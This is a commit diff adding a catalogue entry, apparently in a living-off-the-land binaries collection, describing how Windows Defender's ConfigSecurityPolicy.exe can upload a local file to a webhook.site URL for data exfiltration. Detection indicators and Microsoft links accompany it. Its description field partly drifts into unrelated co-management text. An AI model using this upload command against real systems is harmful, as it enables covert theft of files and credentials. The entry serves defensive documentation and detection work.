Create ConfigSecurityPolicy.yml

2024-10-23 00:58:42 +02:00 · 2020-09-04 07:54:44 -03:00 · 2020-09-04 07:54:44 -03:00 · 6a5af9a71c
commit 6a5af9a71c
parent aa34fd8677
1 changed files with 31 additions and 0 deletions
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -0,0 +1,31 @@
+---
+Name: ConfigSecurityPolicy.exe
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
+Author: 'Ialle Teixeira'
+Created: '04/09/2020'
+Commands:
+  - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Upload file
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    MitreLink: https://attack.mitre.org/techniques/T1567/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: ConfigSecurityPolicy storing data into alternate data streams.
+  - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
+  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
+  - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
+Resources:
+  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
+  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
+  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
+Acknowledgement:
+  - Person: Ialle Teixeira
+    Handle: '@NtSetDefault'
+---